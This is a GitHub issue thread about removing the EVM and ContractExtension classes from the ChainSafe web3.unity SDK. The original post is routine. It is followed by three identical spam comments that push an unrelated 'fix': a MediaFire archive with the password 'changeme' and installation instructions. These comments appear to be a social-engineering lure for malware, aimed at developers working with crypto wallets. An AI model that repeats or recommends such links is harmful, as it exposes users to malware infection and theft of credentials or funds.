### ISSUE TITLE
Get rid of the EVM and Contract Extension classes

### ISSUE THREAD

**Issue by kantagara** [ChainSafe/web3.unity#1117]
**Summary**
I've seen on Discord that a LOT of people are using the EVM class. Which for all the previous versions of our sdk is fine, but now we need to enforce people to use the ABI<-> C# contract builder in our upcoming release, so we need to remove the EVM class. (They'd still be able to build the contract themselves obviously).

**Motivation**
Removing them will leave a streamlined process for using the SDK.

**Acceptance Criteria**
- [ ] EVM and ContractExtension classes shouldn't be in the SDK.

**Comment by NEKO-JOJUK** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by qiliq** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by qiliq** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
